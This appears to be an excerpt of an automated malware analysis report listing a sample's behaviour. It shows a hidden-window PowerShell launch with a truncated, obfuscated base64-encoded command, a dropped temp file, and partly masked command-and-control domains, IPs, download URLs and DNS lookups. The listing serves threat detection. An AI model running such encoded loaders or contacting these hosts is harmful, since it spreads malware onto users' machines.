Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABDAHAAYQBwAHkANwBlAD0AKAAoACcAQgAnACsAJwBnADIAdQAnACkAKwAoACcANQAnACsAJwAzAHgAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAcwBFAFIAUA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1432
- %TEMP%\675749.cvr
- 'ro####oundup.com':80
- 'fu###uggage.com':443
- '35.##4.126.222':80
- '51.##.77.138':80
- '54.##4.148.19':80
- http://ro####oundup.com/epk/4/
- http://51.##.77.138/arminb.at/p6/
- 'fu###uggage.com':443
- DNS ASK ro####oundup.com
- DNS ASK pe###ilm.com
- DNS ASK fu###uggage.com
- DNS ASK ho##co.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABDAHAAYQBwAHkANwBlAD0AKAAoACcAQgAnACsAJwBnADIAdQAnACkAKwAoACcANQAnACsAJwAzAHgAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAcwBFAFIAUA...' (with hidden window)